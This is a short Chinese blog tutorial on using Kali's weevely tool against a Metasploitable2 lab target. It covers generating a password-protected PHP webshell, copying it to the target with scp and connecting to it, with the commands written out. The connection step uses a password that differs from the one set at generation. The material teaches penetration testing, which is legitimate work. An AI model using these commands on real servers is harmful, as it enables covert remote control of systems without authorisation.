发布于2022年11月4日2年前 weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!并且携带了大量的管理模块,为渗透带来了更多的惊喜与便利!下面我们来实例演示, weevely 的具体使用。准备环境:kali linuxMetasploitables2首先还是先制作一个 webshell ,密码为 bbskaliweevely generate bbskali secist.php可以看到,很快就为我们生成了一个大小1000多字节的 webshell 。http://www.secist.com/wp-content/uploads/2016/10/20161014185456.png我们使用 cat 命令简单查看下 webshell 的内容:cat /usr/share/weevely/secist.phphttp://www.secist.com/wp-content/uploads/2016/10/20161014185525.png现在我将生成的 webshell 远程拷贝到目标机器上:scp /usr/share/weevely/secist.php [email protected]:/home/msfadmin或者上传PHP木马连接一句话木马weevely http://192.168.30.128/secist.php secisthttp://www.secist.com/wp-content/uploads/2016/10/20161014190249.png 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/87.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见